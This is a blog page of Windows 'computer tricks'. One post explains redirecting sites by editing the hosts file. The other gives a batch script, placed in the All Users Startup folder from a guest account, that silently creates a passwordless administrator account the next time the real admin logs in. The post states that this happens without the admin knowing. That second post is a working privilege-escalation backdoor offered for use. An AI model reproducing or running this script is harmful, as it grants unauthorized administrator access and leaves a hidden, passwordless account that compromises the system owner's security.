Skip to main content

Posts

Showing posts with the label computer tricks

Trick your webpage with different method

Trick your webpage A simple text file edit makes sites redirect to another. When you type address in address bar in any browser and enter it then it will display another web page, for example:- when you type Google.com you will be redirected to yahoo.com Instructions to do: 1) Go to this directory [c:\windows\system32\drivers\etc], directory may change according to drive used for os installation 2) then hit enter 3) find a file named "hosts" 4) Right click on it and open with word pad. 5) In the last link of the document type the IP* address of yahoo space www.Google.com (Vice versa for other sites) 6) now save it 7) restart the browser if its already running 8) Now try it, It works perfect IP*: to find IP address of that website Goto start ->Run > type cmd > enter. Now you have a new window on desktop. On that type this without cotes "ping www. yahoo.com" replace yahoo.com with your preferred site and then enter it   ...

Create An Admin Account Using Guest Account

Hello Friend's,  I am back How to create an Admin account From a Guest Account intresting right..? Creating an administrator account from guest account is very easy and simple. You just need to use your guest account and create one administrator account instantly.           1) . Open Notepad, paste the following :                @echo off                net user Newadmin /add /expires:never /passwordreq:no                net localgroup “Administrators” /add Newadmin           2) . Save it as a .bat file.           3) . Now place this bat file in location local:\Documents and Settings\All Users\Start Menu\Programs\Startup  Now when your admin logs into the system, the  new account will be automatically  created without knowing the admin .Now next time when you will log...